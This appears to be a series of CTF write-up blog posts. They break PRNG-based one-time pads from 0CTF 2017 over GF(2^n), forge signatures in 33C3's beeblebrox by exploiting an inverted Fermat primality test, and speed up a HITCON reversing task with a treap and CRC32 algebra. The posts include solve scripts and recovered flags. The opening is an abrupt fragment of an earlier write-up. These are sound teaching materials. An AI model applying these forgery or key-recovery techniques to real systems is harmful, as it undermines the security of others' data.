TABLE = [0x0ED,0x67,0x7F,0x0F6,0x0C7,0x9A,0x24,0x12,0x0BA,0x83,0x49,0x0DB,0x13,0x0BF,0x61,0x0B0,0x0FF,0x69,0x80,0x0EC,0x0DE,0x4,0x63,0x0C4,0x96,0x73,0x1B,0x6E,0x0A6,0x9E,0x87,0x4B,0x0FC,0x10,0x2A,0x0C3,0x5C,0x2E,0x36,0x0B2,0x0DF,0x0E3,0x90,0x0FE,0x1A,0x0F,0x1C,0x84,0x1,0x15,0x3A,0x85,0x0A5,0x57,0x3F,0x6D,0x0F5,0x4A,0x0A,0x0D6,0x9F,0x64,0x0B5,0x0F7,0x8F,0x99,0x68,0x4D,0x17,0x0F9,0x0EE,0x0F0,0x3,0x6,0x4C,0x0BD,0x58,0x33,0x0A9,0x0DC,0x3C,0x0A3,0x3B,0x0D1,0x0BB,0x28,0x0F4,0x0B9,0x0CF,0x47,0x0A0,0x6A,0x0C2,0x19,0x0B,0x97,0x81,0x35,0x91,0x7C,0x5D,0x7A,0x48,0x2B,0x41,0x0D9,0x0CB,0x6F,0x56,0x8D,0x5A,0x0C5,0x3E,0x0D8,0x0C0,0x60,0x1F,0x9,0x0CA,0x7B,0x25,0x0E7,0x0AE,0x0F2,0x77,0x0FA,0x3D,0x50,0x0E2,0x4F,0x0C9,0x2C,0x53,0x45,0x0C1,0x0E9,0x46,0x0D,0x70,0x8A,0x0A1,0x0D5,0x94,0x92,0x88,0x95,0x9D,0x26,0x9B,0x0E4,0x5,0x44,0x11,0x2D,0x7,0x1E,0x0A4,0x38,0x0E1,0x0A8,0x52,0x89,0x0AF,0x40,0x72,0x0E5,0x0B4,0x7E,0x51,0x6C,0x0FB,0x76,0x62,0x0D4,0x8,0x9C,0x54,0x5B,0x75,0x29,0x0C6,0x66,0x0DA,0x0FD,0x14,0x86,0x78,0x16,0x0B6,0x8B,0x39,0x0E6,0x0B7,0x1D,0x0D3,0x18,0x0A7,0x30,0x0E8,0x23,0x37,0x7D,0x82,0x0BE,0x34,0x0C,0x55,0x0D0,0x0EF,0x0,0x0CD,0x0AC,0x0A2,0x4E,0x0B3,0x0AB,0x31,0x8E,0x21,0x0E0,0x22,0x74,0x5E,0x8C,0x32,0x0F8,0x0EB,0x2F,0x79,0x0F1,0x42,0x0C8,0x0DD,0x0CE,0x65,0x27,0x5F,0x20,0x0B8,0x0AA,0x0AD,0x71,0x6B,0x0D2,0x0EA,0x0BC,0x0E,0x0CC,0x98,0x2,0x59,0x43,0x0B1,0x93,0x0D7,0x0F3,]

# note 0x20... -> 0x21
nonce = pack("
The flag is: flag{B0s5x1AOb3At0bF~}
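The linear-algebra step can also be sketched in plain Python 3, without Sage. The version below is a self-contained illustration under stated assumptions: `TABLE` and `NONCE` are random stand-ins rather than the values from the plugin, and `prng` is our re-implementation of the mixing loop shown above. Each seed bit selects one of 128 fixed versions of buf, so recovering the seed amounts to solving a linear system over $GF(2)$.

```python
import random

rng = random.Random(0)
TABLE = list(range(256))
rng.shuffle(TABLE)                                     # stand-in S-box (assumption)
NONCE = bytes(rng.randrange(256) for _ in range(16))   # stand-in nonce (assumption)

def buf_versions():
    """Yield the 128 successive values of buf as 128-bit integers."""
    buf = list(NONCE)
    for _ in range(128):
        yield int.from_bytes(bytes(buf), "big")
        buf = [TABLE[b] for b in buf]

def prng(seed):
    """XOR together the buf versions selected by the seed bits (LSB first per byte)."""
    bits = [(seed[i] >> j) & 1 for i in range(16) for j in range(8)]
    out = 0
    for bit, version in zip(bits, buf_versions()):
        if bit:
            out ^= version
    return out

def recover_seed(target):
    """Gaussian elimination over GF(2): find a seed with prng(seed) == target."""
    basis = {}   # pivot bit -> (reduced vector, bitmask of versions it combines)
    for idx, vec in enumerate(buf_versions()):
        mask = 1 << idx
        while vec:
            pivot = vec.bit_length() - 1
            if pivot not in basis:
                basis[pivot] = (vec, mask)
                break
            bvec, bmask = basis[pivot]
            vec ^= bvec
            mask ^= bmask
    selection = 0
    while target:
        pivot = target.bit_length() - 1
        if pivot not in basis:
            return None                  # target is not reachable
        bvec, bmask = basis[pivot]
        target ^= bvec
        selection ^= bmask
    return bytes((selection >> (8 * i)) & 0xFF for i in range(16))

output = prng(b"THIS_IS_A_SEED!!")
found = recover_seed(output)
assert found is not None and prng(found) == output
```

With a stand-in table the system may be singular, in which case the recovered seed is only one of several that produce the same output.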

0CTF 2017 Quals – OneTimePad 1 and 2

hellman — Mon, 20 Mar 2017 07:54:15 +0000

I swear that the safest cryptosystem is used to encrypt the secret!
oneTimePad.zip

Well, maybe the previous one is too simple. So I designed the ultimate one to protect the top secret!
oneTimePad2.zip

Summary: breaking a linear PRNG and an LCG-style exponential PRNG.

In these challenges we need to break a PRNG. We are given a part of the keystream and we need to recover another part to decrypt the flag.

OneTimePad 1

The code:

from os import urandom

def process(m, k):
    tmp = m ^ k
    res = 0
    for i in bin(tmp)[2:]:
        res = res << 1;
        if (int(i)):
            res = res ^ tmp
        if (res >> 256):
            res = res ^ P
    return res

def keygen(seed):
    key = str2num(urandom(32))
    while True:
        yield key
        key = process(key, seed)

def str2num(s):
    return int(s.encode('hex'), 16)

P = 0x10000000000000000000000000000000000000000000000000000000000000425L

true_secret = open('flag.txt').read()[:32]
assert len(true_secret) == 32
print 'flag{%s}' % true_secret
fake_secret1 = "I_am_not_a_secret_so_you_know_me"
fake_secret2 = "feeddeadbeefcafefeeddeadbeefcafe"
secret = str2num(urandom(32))

generator = keygen(secret)
ctxt1 = hex(str2num(true_secret) ^ generator.next())[2:-1]
ctxt2 = hex(str2num(fake_secret1) ^ generator.next())[2:-1]
ctxt3 = hex(str2num(fake_secret2) ^ generator.next())[2:-1]
f = open('ciphertext', 'w')
f.write(ctxt1+'\n')
f.write(ctxt2+'\n')
f.write(ctxt3+'\n')
f.close()

The key observation here is that $process(m, k)$ is … just squaring of $m \oplus k$ in $GF(2^{256})$, with the irreducible polynomial given by $P$. To invert squaring, we can simply square $255$ times more:

c1 = 0xaf3fcc28377e7e983355096fd4f635856df82bbab61d2c50892d9ee5d913a07f
c2 = 0x630eb4dce274d29a16f86940f2f35253477665949170ed9e8c9e828794b5543c
c3 = 0xe913db07cbe4f433c7cdeaac549757d23651ebdccf69d7fbdfd5dc2829334d1b

k2 = c2 ^ str2num(fake_secret1)
k3 = c3 ^ str2num(fake_secret2)

kt = k3
for i in xrange(255):
    kt = process(kt, 0)

seed = kt ^ k2
print "SEED", seed
assert process(k2, seed) == k3

kt = k2
for i in xrange(255):
    kt = process(kt, 0)

k1 = kt ^ seed
print "K1", k1
assert process(k1, seed) == k2

m = k1 ^ c1
print `hex(m)[2:-1].decode("hex")`

The flag: flag{t0_B3_r4ndoM_en0Ugh_1s_nec3s5arY}
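Both properties used here, that 255 further squarings undo one squaring and that squaring is linear over $GF(2)$, can be checked directly. The sketch below is a Python 3 port of process; the helper `unsquare` and the test values are ours.

```python
import random

P = (1 << 256) | 0x425    # x^256 + x^10 + x^5 + x^2 + 1, as in the challenge

def process(m, k):
    """Python 3 port of the challenge function: (m xor k)^2 in GF(2^256)."""
    tmp = m ^ k
    res = 0
    for bit in bin(tmp)[2:]:
        res <<= 1
        if bit == "1":
            res ^= tmp
        if res >> 256:
            res ^= P
    return res

def unsquare(y):
    """Square root in GF(2^256): square 255 more times (hypothetical helper)."""
    for _ in range(255):
        y = process(y, 0)
    return y

rng = random.Random(1)
a, b = rng.getrandbits(256), rng.getrandbits(256)

# Squaring 256 times in total is the identity.
assert process(unsquare(a), 0) == a
# Squaring is linear over GF(2): (a + b)^2 = a^2 + b^2.
assert process(a ^ b, 0) == process(a, 0) ^ process(b, 0)
```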

Another way to solve this is to see that process is linear (indeed, squaring in $GF(2^x)$ is linear) and can be inverted by linear algebra. Even funnier, a proper encoding of the problem for z3 yields the result too, but only after ~1.5 hours on my laptop:

from z3.z3 import *

def proc(m, k):
    tmp = m ^ k
    res = 0
    for i in xrange(256):
        feedback = res >> 255
        res = res << 1
        mask = (tmp << i) >> 255
        res = res ^ (tmp & mask)
        res = res ^ (P & feedback)
    return res

# realk1 = k1
# realseed = seed

seed = BitVec("seed", 256)
k1 = BitVec("k1", 256)

s = Solver()
s.add(proc(k1, seed) == k2)
s.add(proc(k2, seed) == k3)

print "Solving..."
print s.check()
model = s.model()
k1 = int(model[k1].as_long())
print `hex(k1 ^ c1)[2:-1].decode("hex")`

OneTimePad 2

The code:

from os import urandom

def process1(m, k):
    res = 0
    for i in bin(k)[2:]:
        res = res << 1;
        if (int(i)):
            res = res ^ m
        if (res >> 128):
            res = res ^ P
    return res

def process2(a, b):
    res = []
    res.append(process1(a[0], b[0]) ^ process1(a[1], b[2]))
    res.append(process1(a[0], b[1]) ^ process1(a[1], b[3]))
    res.append(process1(a[2], b[0]) ^ process1(a[3], b[2]))
    res.append(process1(a[2], b[1]) ^ process1(a[3], b[3]))
    return res

def nextrand(rand):
    global N, A, B
    tmp1 = [1, 0, 0, 1]
    tmp2 = [A, B, 0, 1]
    s = N
    N = process1(N, N)
    while s:
        if s % 2:
            tmp1 = process2(tmp2, tmp1)
        tmp2 = process2(tmp2, tmp2)
        s = s / 2
    return process1(rand, tmp1[0]) ^ tmp1[1]


def keygen():
    key = str2num(urandom(16))
    while True:
        yield key
        key = nextrand(key)

def encrypt(message):
    length = len(message)
    pad = '\x00' + urandom(15 - (length % 16))
    to_encrypt = message + pad
    res = ''
    generator = keygen()
    f = open('key.txt', 'w') # This is used to decrypt and of course you won't get it.
    for i, key in zip(range(0, length, 16), generator):
        f.write(hex(key)+'\n')
        res += num2str(str2num(to_encrypt[i:i+16]) ^ key)
    f.close()
    return res

def decrypt(ciphertxt):
    # TODO
    pass

def str2num(s):
    return int(s.encode('hex'), 16)

def num2str(n, block=16):
    s = hex(n)[2:].strip('L')
    s = '0' * ((32-len(s)) % 32) + s
    return s.decode('hex')

P = 0x100000000000000000000000000000087
A = 0xc6a5777f4dc639d7d1a50d6521e79bfd
B = 0x2e18716441db24baf79ff92393735345
N = str2num(urandom(16))
assert N != 0

if __name__ == '__main__':
    with open('top_secret') as f:
        top_secret = f.read().strip()
    assert len(top_secret) == 16
    plain = "One-Time Pad is used here. You won't know that the flag is flag{%s}." % top_secret

    with open('ciphertxt', 'w') as f:
        f.write(encrypt(plain).encode('hex')+'\n')

This one is a bit trickier. Still, it is easy to spot that $process1(m, k)$ is a multiplication in $GF(2^{128})$. A closer look at $process2$ reveals that it is just a multiplication of two $2 \times 2$ matrices. What does $nextrand$ do? It implements a fast exponentiation. Let

$M = \begin{bmatrix}
A & B \\
0 & 1 \\
\end{bmatrix}$.

Then

$nextrand(rand) = M^N[0,0] \cdot rand + M^N[0,1]$,

and also $N$ is updated to $N^2$. Which values of $M^N$ are being used? Let’s look at powers of $M$ symbolically:

sage: R.<a,b> = GF(2**128, name='a')[]
sage: M = matrix(R, [[a, b], [0, 1]])
sage: M
[a b]
[0 1]
sage: M**2
[    a^2 a*b + b]
[      0       1]
sage: M**3
[            a^3 a^2*b + a*b + b]
[              0               1]
sage: M**4
[                    a^4 a^3*b + a^2*b + a*b + b]
[                      0                       1]

Hmm, the first entry is simply $A^N$ and the second entry is equal to

$B(A^{N-1} + A^{N-2} + \ldots + 1) = B(A^N-1)/(A-1)$.

Therefore, we have the following equations:

$PRNG_1 = key$;
$PRNG_2 = A^N \cdot PRNG_1 + B(A^N-1)/(A-1)$;
$PRNG_3 = A^{N^2} \cdot PRNG_2 + B(A^{N^2}-1)/(A-1)$;
and so on, the exponent is squared each time.

Here $N$ is unknown, and we can’t solve for it directly. Let’s solve for $A^N$ first and then solve a discrete logarithm problem.

Let’s multiply the second equation by $(A-1)$:

$PRNG_2 \cdot (A-1) = A^N \cdot PRNG_1 \cdot (A-1) + B(A^N-1),$

$\Leftrightarrow A^N = \frac{PRNG_2 \cdot (A-1) + B}{PRNG_1 \cdot (A-1) + B}$.
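Both the closed form for $M^N$ and the formula for $A^N$ can be verified numerically. The Python 3 sketch below re-implements the field arithmetic; the names `gf_mul`, `gf_pow`, `gf_inv`, `mat_mul`, `next_key` and the example values of `N` and `key1` are ours. Note that subtraction is XOR in characteristic 2, so $A-1$ becomes `A ^ 1`.

```python
P = (1 << 128) | 0x87     # modulus from the challenge
A = 0xc6a5777f4dc639d7d1a50d6521e79bfd
B = 0x2e18716441db24baf79ff92393735345

def gf_mul(a, b):
    """Multiplication in GF(2^128) modulo P (same result as process1)."""
    res = 0
    while b:
        if b & 1:
            res ^= a
        a <<= 1
        if a >> 128:
            a ^= P
        b >>= 1
    return res

def gf_pow(a, e):
    res = 1
    while e:
        if e & 1:
            res = gf_mul(res, a)
        a = gf_mul(a, a)
        e >>= 1
    return res

def gf_inv(a):
    return gf_pow(a, 2**128 - 2)

def mat_mul(a, b):
    """2x2 matrix product with the same flat layout as process2."""
    return [gf_mul(a[0], b[0]) ^ gf_mul(a[1], b[2]),
            gf_mul(a[0], b[1]) ^ gf_mul(a[1], b[3]),
            gf_mul(a[2], b[0]) ^ gf_mul(a[3], b[2]),
            gf_mul(a[2], b[1]) ^ gf_mul(a[3], b[3])]

def next_key(key, n):
    """nextrand without the update of N: apply M^n to key."""
    acc, base = [1, 0, 0, 1], [A, B, 0, 1]
    while n:
        if n & 1:
            acc = mat_mul(base, acc)
        base = mat_mul(base, base)
        n >>= 1
    return gf_mul(key, acc[0]) ^ acc[1]

N = 0x0123456789abcdef0fedcba987654321      # arbitrary example exponent
key1 = 0x00112233445566778899aabbccddeeff   # arbitrary example PRNG_1
key2 = next_key(key1, N)
AN = gf_pow(A, N)

# Closed form: PRNG_2 = A^N * PRNG_1 + B (A^N - 1) / (A - 1).
assert key2 == gf_mul(AN, key1) ^ gf_mul(gf_mul(B, AN ^ 1), gf_inv(A ^ 1))

# Recover A^N from two consecutive outputs.
num = gf_mul(key2, A ^ 1) ^ B
den = gf_mul(key1, A ^ 1) ^ B
assert gf_mul(num, gf_inv(den)) == AN
```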

Thus we can compute $A^N$. To get $N$ we need to compute discrete logarithm in $GF(2^{128})$. There are subexponential algorithms, so that the 128-bit size is quite practical. Indeed, sage can do it in a few minutes:

from sage.all import *

plain = "One-Time Pad is used here. You won't know that the flag is flag{"
ct = "0da8e9e84a99d24d0f788c716ef9e99cc447c3cf12c716206dee92b9ce591dc0722d42462918621120ece68ac64e493a41ea3a70dd7fe2b1d116ac48f08dbf2b26bd63834fa5b4cb75e3c60d496760921b91df5e5e631e8e9e50c9d80350249c".decode("hex")

vals = []
for i in xrange(0, 64, 16):
    vals.append(str2num(plain[i:i+16]) ^ str2num(ct[i:i+16]))
    print "KEY %02d" % i, hex(vals[-1])

p0 = vals[0]
p1 = vals[1]
uppp = process1(p1, A ^ 1) ^ B
down = process1(p0, A ^ 1) ^ B
# pow1 (not shown) is exponentiation in GF(2^128) built on process1
down = pow1(down, 2**128-2)  # inversion: x^(2^128 - 2) = 1/x
AN = process1(uppp, down)
print "A^N", AN

def ntopoly(npoly):
    return sum(c*X**e
        for e, c in enumerate(Integer(npoly).bits()))

X = GF(2).polynomial_ring().gen()
poly = ntopoly(P)
F = GF(2**128, modulus=poly, name='a')
a = F.fetch_int(A)
an = F.fetch_int(AN)

N = int(discrete_log(an, a))
# takes ~1 minute
# N = 76716889654539547639031458229653027958
assert a**N == an

def keygen2(key):
    while True:
        yield key
        key = nextrand(key)

K = vals[0]
print "K", K
print "N", N
print `encrypt(ct, keygen2(K))`

The flag: flag{LCG1sN3ver5aFe!!}

33C3 CTF 2016 – beeblebrox (Crypto 350)

hellman — Sun, 19 Mar 2017 22:30:30 +0000

Make bad politicians resign!

nc 78.46.224.72 2048

files

Summary: factorization-based attack on a signature method

In this challenge we have access to a signature oracle which refuses to sign one special message. Our goal is to obtain a valid signature for that special message.

Code for the oracle:

...
# msg and ctr are sent by the client
ctr = decode(ctr, 0, 2**32) # allowed range
h = hash(msg, ctr)
if msg == TARGET_MSG or not is_prime(h, 128):
    self.send_msg("Sorry, I can't sign that.")
else:
    exponent = modinv(h, PHI)
    signature = pow(S, exponent, MODULUS)
    self.send_msg("Here you are, darling!")
    self.send_msg(encode(signature, 256))
...

And for the challenge:

ctr = decode(ctr, 0, 2**32)
signature = decode(signature, 2, MODULUS)
h = hash(TARGET_MSG, ctr)
if msg == TARGET_MSG and pow(signature, h, MODULUS) == S
   and is_prime(h, 128):
    self.send_msg("Okay, I give up :(")
    self.send_msg("Here's your flag: " + FLAG)
else:
    self.send_msg("No.")

So far so good, but let’s look at the is_prime function:

def is_prime(n, c):
    if n <= 1: return False
    if n == 2 or n == 3: return True
    if n % 2 == 0: return False
    for _ in range(c):
        a = random.randrange(1, n)
        if not pow(a, n-1, n) != 1:
            return False
    return True

It is just a Fermat primality test! We could try to use Carmichael numbers, but hardly any hash of the TARGET_MSG with one of the $2^{32}$ nonces will be a Carmichael number.. Wait.. Look at this line: if not pow(a, n-1, n) != 1:. The condition is inverted! The not should not be there!

It turns out that, apart from the special cases 2 and 3, is_prime accepts only odd composite numbers. How can we use it?
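The effect of the inverted condition is easy to observe. The sketch below copies the test, bug included, into Python 3 and runs it on a prime and on a product of two primes; the choice of the Mersenne primes $2^{61}-1$ and $2^{89}-1$ as test inputs is ours.

```python
import random

def is_prime_buggy(n, c):
    """The challenge's primality test, with the inverted condition kept."""
    if n <= 1: return False
    if n == 2 or n == 3: return True
    if n % 2 == 0: return False
    for _ in range(c):
        a = random.randrange(1, n)
        if not pow(a, n - 1, n) != 1:
            return False
    return True

M61 = 2**61 - 1      # a Mersenne prime
M89 = 2**89 - 1      # another Mersenne prime

# A prime satisfies Fermat's congruence for every base, so it is rejected
# on the very first iteration.
print(is_prime_buggy(M61, 128))
# A large composite is accepted unless one of the 128 random bases happens
# to be a Fermat liar, which is extremely unlikely for this number.
print(is_prime_buggy(M61 * M89, 128))
```

Small composites behave differently: they have enough Fermat liars (the base 1 is always one) that 128 random draws will usually hit one, so the test rejects them as well.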

The signatures look like this:

$sig(msg) = S^{1/h(msg,nonce)} \mod N$.

Since the primality test is wrong, we want to use factorizations. Indeed, if we know $S^{1/(kp)}$ we can compute

$(S^{1/(kp)})^k \mod N = S^{1/p} \mod N $.

In such a way we can collect $S^{1/p}$ for many small primes and hope that $h(msg,nonce)$ will be smooth, that is will contain only those small primes in its factorization.

But how do we combine signatures for two primes? That's slightly trickier. We don't have many options. Let's try to multiply the signatures:

$S^{1/p} S^{1/q} = S^{\frac{p+q}{pq}}$.

Not the $S^{1/(pq)}$ that we wanted.. But can we change $p+q$ to 1 somehow? Indeed, let's generalize our multiplication:

$(S^{1/p})^a (S^{1/q})^b = S^{a/p} S^{b/q} = S^{\frac{bp+aq}{pq}}$.

If $p$ and $q$ are coprime, then we can use the Extended Euclidean Algorithm to find parameters $a,b$ such that $bp+aq=1$ and we are done!
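The combination step can be sketched as follows. This is a minimal illustration, not the script used during the CTF: the names `egcd` and `combine_roots` and the toy modulus are assumptions made here, and negative exponents rely on Python 3.8+ `pow` computing modular inverses.

```python
def egcd(a, b):
    """Return (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    x0, y0, x1, y1 = 1, 0, 0, 1
    while b:
        q, a, b = a // b, b, a % b
        x0, x1 = x1, x0 - q * x1
        y0, y1 = y1, y0 - q * y1
    return a, x0, y0

def combine_roots(root_p, p, root_q, q, N):
    """Given S^(1/p) and S^(1/q) mod N, return S^(1/(p*q)) mod N."""
    g, b, a = egcd(p, q)          # b*p + a*q == 1
    assert g == 1, "p and q must be coprime"
    # (S^(1/p))^a * (S^(1/q))^b = S^((a*q + b*p)/(p*q)) = S^(1/(p*q))
    return pow(root_p, a, N) * pow(root_q, b, N) % N

# Toy check with a tiny modulus whose factorization we know (illustration only).
N, PHI, S = 1009 * 1013, 1008 * 1012, 1234
root5 = pow(S, pow(5, -1, PHI), N)     # what the oracle would hand out
root13 = pow(S, pow(13, -1, PHI), N)
root65 = combine_roots(root5, 5, root13, 13, N)
print(pow(root65, 65, N) == S)
```

Applying `combine_roots` repeatedly, one prime at a time, gives $S^{1/H}$ for any squarefree $H$ whose prime factors have all been collected.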

Data

We found that H = hash(TARGET_MSG, nonce=35856) has the following factorization:

sage: factor(15430531282988074152696358566534774123)
3 * 11 * 19 * 137 * 173 * 337 * 7841 * 107377 * 206597 * 3446693 * 5139341

And hash("blah", nonce) gives us all these prime factors for the following nonces:

nonces = [
    464628494, # 3
    513958308, # 11
    584146771, # 19
    501252653, # 137
    836242304, # 173
    119438940, # 337
    242937565, # 7841
    853304146, # 107377
    642736722, # 206597
    836398440, # 3446693
    54720172 , # 5139341
]

After implementing and running the attack, we get the flag: 33C3_DONT_USE_BRUTE_FORCE_AGAINST_POLITICIANS

hack you spb @ 17 Oct 2016

vos — Sat, 15 Oct 2016 17:16:09 +0000

Remember hack you CTF? Yeah, that random event that we throw for our freshmen and everyone interested. We’re hosting a new one.

It’s fall already and that means the new CTF season is starting, and so is the new academic year in the universities.

This is the time when we want to attract more freshmen into our CTF tarpit. Specifically, to our SPbCTF meetups in our city.
So we are running — a CTF.

But it’s not just for the freshmen. Wouldn’t it be fun to allow the whole world to beat the shit out of our first-year students, right? So we are opening hack you spb to everyone interested, just separating the scoreboards: one for the world and the other just for confirmed SPbCTF fresh blood (bonus: if you manage to soceng our padawans for a verification string, you can compete in that special chart too).

Registration open: October 15th, 2016 — October 21st, 2016
Game starts: October 17th, 2016 15:00 UTC
Game ends: October 21st, 2016 15:00 UTC

Sign up: http://hackyou.ctf.su/

Don’t expect it to be challenging, it will be more of a speed-hack contest.

So in just a few words: New hack you. School-level tasks. October 17th.

HITCON CTF QUALS 2016 – Reverse (Reverse + PPC 500)

hellman — Tue, 11 Oct 2016 18:13:16 +0000

At least our ETA is better than M$.
http://xkcd.com/612/

reverse.bin

Summary: optimizing an algorithm using Treap data structure and CRC32 properties.

After reverse-engineering the binary, we can write the following pseudocode in python:

from binascii import crc32

def lcg_step():
    global lcg
    lcg = (0x5851F42D4C957F2D * lcg + 0x14057B7EF767814F) % 2**64
    return lcg

def extract(val):
    res = 32 + val - 95 * ((
        ((val - (0x58ED2308158ED231 * val >> 64)) >> 1) +
        (0x58ED2308158ED231 * val >> 64)) >> 6)
    return chr(res & 0xff)

buf = []
lcg = 8323979853562951413

crc = 0
for i in xrange(31415926):
    # append a symbol
    c = extract( lcg_step() )
    buf.append(c)

    # reverse interval
    x = lcg_step() % len(buf)
    y = lcg_step() % len(buf)
    l, r = min(x, y), max(x, y)
    buf[l:r+1] = buf[l:r+1][::-1]

    # update crc
    crc = crc32("".join(buf), crc) % 2**32

array = [...] # from binary
flag = ""
for i in range(len(array)):
    if buf[array[i]] == "}":
        flag += "%08x" % crc
    flag += buf[array[i]]

The binary generates a large array using an LCG PRNG, reverses subarrays chosen by the PRNG, and updates the CRC of the whole state after each iteration. There are about 31 million iterations in total, and naively reversing subarrays and recomputing CRC32 takes quadratic time, which is infeasible. We have to come up with a better algorithm.

One of the data structures which can quickly reverse intervals is the Treap, also known as a randomized binary search tree. Since it is basically a binary search tree, it can easily be modified to maintain and update various sums on intervals. Since CRC32 is not a simple sum, it requires some special care. I took the basic implementation of Treap from here (the code at the end of the article).

A good thing about the Treap is that it lets us quickly “extract” a node which corresponds to any interval of the array. In conjunction with lazy propagation, this allows cool things. For example, to reverse an interval we “extract” the node corresponding to that interval and set a “rev” flag. If we later visit this node for some reason, the reversal is “pushed down”: the two children of the node are swapped and each child’s “rev” flag is flipped. In this lazy way we do a logarithmic number of operations per reversal on average.
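For readers who have not seen the trick, here is a minimal Python sketch of an implicit treap with lazy interval reversal. It is not the implementation linked above; all names (`Node`, `split`, `merge`, `reverse`, `to_list`) are chosen here for illustration, and the CRC bookkeeping is left out.

```python
import random

class Node:
    def __init__(self, val):
        self.val, self.prio = val, random.random()
        self.left = self.right = None
        self.size, self.rev = 1, False

def size(t):
    return t.size if t else 0

def pull(t):
    t.size = 1 + size(t.left) + size(t.right)

def push(t):
    """Push a pending reversal down to the children."""
    if t and t.rev:
        t.left, t.right = t.right, t.left
        for child in (t.left, t.right):
            if child:
                child.rev ^= True
        t.rev = False

def split(t, k):
    """Split into (first k elements, the rest)."""
    if not t:
        return None, None
    push(t)
    if size(t.left) >= k:
        l, r = split(t.left, k)
        t.left = r
        pull(t)
        return l, t
    l, r = split(t.right, k - size(t.left) - 1)
    t.right = l
    pull(t)
    return t, r

def merge(a, b):
    if not a or not b:
        return a or b
    if a.prio > b.prio:
        push(a)
        a.right = merge(a.right, b)
        pull(a)
        return a
    push(b)
    b.left = merge(a, b.left)
    pull(b)
    return b

def reverse(t, l, r):
    """Reverse positions l..r (inclusive) by flagging the extracted node."""
    a, bc = split(t, l)
    b, c = split(bc, r - l + 1)
    if b:
        b.rev ^= True
    return merge(a, merge(b, c))

def to_list(t, out):
    if t:
        push(t)
        to_list(t.left, out)
        out.append(t.val)
        to_list(t.right, out)
    return out

root = None
for ch in "abcdefgh":
    root = merge(root, Node(ch))
root = reverse(root, 2, 5)
print("".join(to_list(root, [])))
```

Each `reverse` call touches only the nodes on the split and merge paths, which is where the expected logarithmic cost per operation comes from.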

The main problem here is to update the CRC32 state with the whole array after each reversal. We need to teach our Treap to compute CRC32 even after performing reversals.

Note that the CRC32 value is added to the flag only at the end. Thus, using this basic Treap, we can already compute the final string and extract the first part of the flag in a few minutes:

hitcon{super fast reversing and CRC32 – [FINAL CRC HERE]}

Unfortunately, we HAVE to compute the CRC to get the points. Let’s do it!

About CRC32

The CRC32 without the initial and the final xors with 0xffffffff (let’s call it $rawCRC32$) is simply multiplication modulo an irreducible polynomial over $GF(2)$:

$$rawCRC32(m) = m \times x^{32} \mod P(x),$$

where

$$\begin{split}
P(x) & = & x^{32}+x^{26}+x^{23}+x^{22}+x^{16}+x^{12}+x^{11} \\
& + & x^{10}+x^8+x^7+x^5+x^4+x^2+x+1.
\end{split}$$

Such polynomials are nicely stored in 32-bit words. For example, $P(x) = \mathtt{0xEDB88320}$ (MSB are lowest degree terms). Multiplications are done in a way similar to fast exponentiation (see Finite field arithmetic).

A good thing is that $rawCRC32(m)$ is linear:

$$rawCRC32(a \oplus b) = rawCRC32(a) \oplus rawCRC32(b).$$

Shifting the message left by one bit is equivalent to multiplying it by $x$. Therefore, for concatenation we get:

$$rawCRC32(a || b) = rawCRC32(a) \times x^{|b|} \oplus rawCRC32(b).$$

Using this formula allows us to combine CRC values of two large strings quite quickly. Computing $x^{|b|}$ can be done using fast exponentiation, or the powers can simply be precomputed.
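The concatenation formula is easy to check against `zlib`. In the sketch below, `raw_crc32` strips the initial and final xors by starting `zlib.crc32` from 0xffffffff and xoring the result with 0xffffffff; the helper names `shift_bytes` and `concat_crc` are made up here, and polynomials use the same reflected 32-bit encoding as above (MSB is the lowest degree term).

```python
import zlib

POLY = 0xEDB88320      # P(x) without the x^32 term, reflected encoding
HI = 1 << 31           # the polynomial 1
ONEBYTE = HI >> 8      # the polynomial x^8

def poly_mul(a, b):
    """Multiply two polynomials modulo P(x)."""
    p = 0
    while b:
        if b & HI:
            p ^= a
        b = (b << 1) & 0xFFFFFFFF
        # multiply a by x, reducing if the x^31 term overflows
        a = (a >> 1) ^ POLY if a & 1 else a >> 1
    return p

def raw_crc32(data):
    """CRC32 without the initial and final xors with 0xffffffff."""
    return zlib.crc32(data, 0xFFFFFFFF) ^ 0xFFFFFFFF

def shift_bytes(n):
    """x^(8n) mod P(x) by repeated multiplication (fine for short strings)."""
    s = HI
    for _ in range(n):
        s = poly_mul(s, ONEBYTE)
    return s

def concat_crc(crc_a, crc_b, len_b):
    """rawCRC32(a || b) from rawCRC32(a), rawCRC32(b) and |b| in bytes."""
    return poly_mul(crc_a, shift_bytes(len_b)) ^ crc_b

a, b = b"super fast ", b"reversing"
print(concat_crc(raw_crc32(a), raw_crc32(b), len(b)) == raw_crc32(a + b))
```

For the real input sizes the linear loop in `shift_bytes` would be replaced by a precomputed table or by square-and-multiply.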

Adding CRC32 into the Treap

Let’s store in each tree node the $rawCRC32$ of the corresponding segment and, additionally, the $rawCRC32$ of the reversed segment. Then, depending on the “rev” flag we may retrieve one or the other value. When we “push” the lazy reversal down, we simply swap the two values. The main part is then computing the two $rawCRC32$ values of a node from the values of its child nodes. This is quite easy to code using the concatenation formula given before. The formula is also useful when merging the CRCs of the consecutive states.

Here is the CRC-related code:

uint32_t POLY = 0xedb88320L;
uint32_t HI = 1u << 31;
uint32_t LO = 1;
uint32_t ONEBYTE = (1u << 31) >> 8;

uint32_t BYTE_CRC[256];
uint32_t SHIFT_BYTES[100 * 1000 * 1000];

inline uint32_t poly_mul(uint32_t a, uint32_t b) {
    uint32_t p = 0;
    while (b) {
        if (b & HI) p ^= a;
        b <<= 1;
        if (a & LO) a = (a >> 1) ^ POLY;
        else a >>= 1;
    }
    return p;
}

void precompute() {
    SHIFT_BYTES[0] = HI; // 1
    FOR(i, 1, 100 * 1000 * 1000) {
        SHIFT_BYTES[i] = poly_mul(SHIFT_BYTES[i-1], ONEBYTE);
    }
    FORN(c, 256) {
        BYTE_CRC[c] = poly_mul(c, ONEBYTE);
    }
}

inline uint32_t lift(uint32_t crc, LL num) {
    return poly_mul(crc, SHIFT_BYTES[num]);
}

And here is the modification of the Treap related to the CRC:

inline uint32_t crc1(pitem it) {
    if (!it) return 0;
    if (it->rev) return it->crc_backward;
    return it->crc_forward;
}
inline uint32_t crc2(pitem it) {
    if (!it) return 0;
    if (it->rev) return it->crc_forward;
    return it->crc_backward;
}

inline void update_up (pitem it) {
    if (it) {
        it->cnt = cnt(it->l) + cnt(it->r) + 1;

        int left_size = cnt(it->l);
        int right_size = cnt(it->r);
        uint32_t cl, cr, cmid;
        cmid = BYTE_CRC[it->value];

        cl = crc1(it->l);
        cr = crc1(it->r);
